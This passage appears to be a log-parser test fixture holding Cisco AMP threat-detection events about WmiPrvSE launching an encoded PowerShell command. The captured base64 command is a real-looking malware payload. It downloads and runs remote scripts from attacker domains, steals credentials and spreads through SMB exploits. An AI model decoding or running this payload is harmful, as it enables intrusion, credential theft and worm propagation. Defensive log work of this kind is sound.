Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"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\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E 
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\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. 
All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", + "ingested": "2021-12-09T13:35:47.010789100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell 
Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbA
BsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIA
AnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWw
AtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQ
BlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdA
A6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIA
AtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbg
